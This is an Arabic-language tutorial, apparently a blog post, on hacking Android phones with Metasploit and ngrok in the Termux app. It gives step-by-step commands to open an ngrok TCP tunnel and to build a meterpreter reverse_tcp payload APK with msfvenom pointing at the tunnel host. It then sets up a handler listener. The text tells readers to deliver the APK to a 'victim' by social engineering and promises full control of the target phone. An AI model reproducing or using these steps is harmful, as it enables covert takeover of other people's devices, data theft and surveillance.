
كيفية اختراق الاندرويد عن طريق Metasploit & Ngrok باستخدام Termux
من خلال هذا المقال ، أريد أن أوضح لكم كيف يمكنك بسهولة اختراق الاندرويد باستخدام metasploit و ngrok في تطبيق Termux.
الميتاسبلويت هو إطار اختبار الاختراق الأكثر استخدامًا في العالم والذي يمكّنك من العثور على الثغرات الأمنية واستغلالها والتحقق من مدى صحتها وخطورتها على الانظمة المستهدفة. تم تطويره بواسطة Rapid7 وهو المنصة الأكثر تفضيلاً لاختبار الاختراق و الهكر.
اقرأ أيضا :
- كيفية تثبيت الميتاسبلويت على Termux
- شرح الميتاسبلويت من الصفر الى الاحتراف - الاختراق المتقدم
- طريقة تكوين بايلود لجميع الأنظمة Creating Metasploit Payloads
لماذا نستخدم NGROK ؟
نجروك اداة بديلة لـ برنامج تثبيت الاي بي الخارجي NO-IP او ما يسمى خدمة Dynamic DNS. ملحق للمساعدة في اختبار الشبكات الخارجية (WAN) باستخدام metasploit لتجنب مشكل تغير الاي بي IP Dynamic، وجود اي بي ثابت IP-Static وما إلى ذلك باستخدام Ngrok يمكنك تخطي هذه المشاكل. لانه حين استخدامك لـ IP الخارجي الخاص بك اثناء اختراق الهاتف حتى لو تم الاختراق بنجاح ستفقد الاتصال بالضحية في اول اعادة تشغيل للروتر الخاص بك ويتغير الاي بي.
تثبيت تطبيق ترمكس Termux على الاندرويد
أولاً قم بتنزيل Termux من متجر PlayStore إلى هاتف Android الخاص بك.وقد تم الشرح في هذا المقال:
تطبيق تارموكس هواتف الاندرويد Termux
ستحتاج بعد ذلك إلى زيارة موقع Ngrok على الويب والاشتراك Signup أولاً. للحصول على حساب خاص بك. ثم تنزيل نسخة البرنامج المناسبة إصدار linux (arm) على هاتف Android الخاص بك على حسب نوع معالج جهازك أو النواة 32 او 64 بت ،
uname -m
افتح Termux في هاتف Android الخاص بك واكتب الأمر LS
ls
إذا كنت لا ترى مجلدًا باسم التخزين - storage ، فاكتب الأمر التالي.
termux-setup-storage
إذا قمت بكتابة الأمر Ls مرة أخرى ، فسترى مجلدًا باسم التخزين لفتح هذا النوع من المجلدات
cd storage
ثم انتقل إلى مجلد التنزيلات عن طريق كتابة الأمر
cd downloads
الآن إذا قمت بكتابة ls فسترى جميع التنزيلات الخاصة بك ، انسخ اسم ملف ngrok-stable-linux-arm.tgz واكتب الأمر
tar -xvzf filename
filename تضع مكانه اسم الملف الذي حملته من قبل على سبيل المثال ngrok-stable-linux-arm64.tgz
او يمكن ان يكون ngrok-stable-linux-arm.tgz ليصبح الامر بهذا الشكل
اوtar -xvzf ngrok-stable-linux-arm.tgz
tar -xvzf ngrok-stable-linux-arm64.tgz
سيقوم هذا الأمر بفك ضغط الملف الآن يمكنك نقل الملف من التنزيلات إلى Termux عن طريق كتابة الأمر
mv ngrok /$HOME
اكتب الآن
cd --
الآن ستصل إلى جذر termux لذا ستحتاج إلى تغيير أذونات المجلد الذي نقلته للتو عن طريق كتابة الأمر
chmod + x ngrok
معن الامر جعل الملف ngrok تنفيذي.
chmod وتعني change mod و +x اختصار لــ execution
الآن لتشغيل او تنفيذ ملف برنامج نجروك
./ngrok
الآن سيُطلب منك مصادقة حسابك عن طريق نسخ رمز المصادقة من الصفحة حيث قمت بتنزيل ملف ngrok zip ، ونسخ رمز المصادقة، اكتب ما يلي بدون قوسين
./ngrok authtoken (your auth token)
الآن تمت مصادقة حسابك وسيتم حفظ رمزك المميز في ملف تكوين.
افتح الآن نقطة الاتصال بجهاز Android الخاص بك
تشغيل ngrok
اكتب الأمر
./ngrok tcp 4543
يمكنك استعمال اي بورت تشاء أعطي 4543. الآن افتح جلسة termux جديدة عن طريق التمرير من اليسار والنقر على جلسة جديدة لا تغلق هذه الجلسة. في الجلسة الجديدة اكتب الأمر
pkg install unstable-repo
ثم سيُطلب منك تثبيت metasploit عن طريق كتابة الأمر
pkg install metasploit
الخطوة الحاسمة التالية هي إنشاء Payload.
لإنشاء بايلود، ستحتاج إلى فهم كلمات رئيسية معينة مرتبطة بأي بايلود ميتاسبلويت.
الكلمات الرئيسية أو البارمترات التي تهمنا هي LHOST (الاي بي ونضع مكانه عنوان نجروك) و (البورت)LPORT.
جلسة نجروك في ترموكس
LHOST = 0.tcp.ngrok.io (والذي يمكنك رؤيته في صف إعادة التوجيه في جلسة ngrok) & LPORT هو 17143 (وهو بجوار :)
الآن لإنشاء Payload باستخدام metasploit ، اكتب الأمر التالي
msfvenom -p android/meterpreter/reverse_tcp LHOST =0.tcp.ngrok.io LPORT = 17143 R> sample.apk
سينشئ الأمر أعلاه تطبيق Payload الذي سيتم تخزينه في جذر termux. لنقل التطبيق إلى نوع تخزين هاتفك
mv sample.apk /storage/emulated/0/
لقد وصلنا الآن إلى الخطوة النهائية والأكثر أهمية وهي استخدام إطار عمل metasploit للوصول إلى الجهاز المستهدف.
لتشغيل metasploit اكتب:
msfconsole
سترى شاشة مثل هذه
يجب أن تكون جلسة NGROK متاحة عبر الإنترنت طوال العملية.
يمكنك إرسال ملف apk إلى الهدف الخاص بك بأي وسيلة سواء عن طريق الهندسة الاجتماعية أو أي طريقة أخرى.
الآن في جلسة metasploit ، اكتب الأوامر التالية واحدة تلو الأخرى
use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST localhostset LPORT 4543
ستكون الأوامر المذكورة أعلاه هي نفسها للجميع إذا كنت تستخدم نفس المنفذ الخاص بي. الآن اكتب في النهاية للاختراق
exploit
بحلول هذا الوقت ، ستستمع إلى الاتصالات الموجودة على المنفذ المحدد ، والآن عندما يقوم الجهاز المستهدف بتثبيت التطبيق الذي قمت بإنشائه ، يمكنك إنشاء اتصال بالجهاز المستهدف وستحصل على تحكم كامل في الهاتف المستهدف.
عند إنشاء اتصال او الاختراق ، ستظهر شاشة مثل هذه
في جلسة meterpreter ، يمكنك كتابة الأمر help لإظهار جميع الخيارات المتاحة واستكشاف الأوامر
meterpreter --help
تهانينا ، لقد تعلمت بنجاح كيفية اختراق Android المستهدف عبر الايبي الخارجي باستخدام metasploit و ngrok في ترمكس
اقرأ أيضا :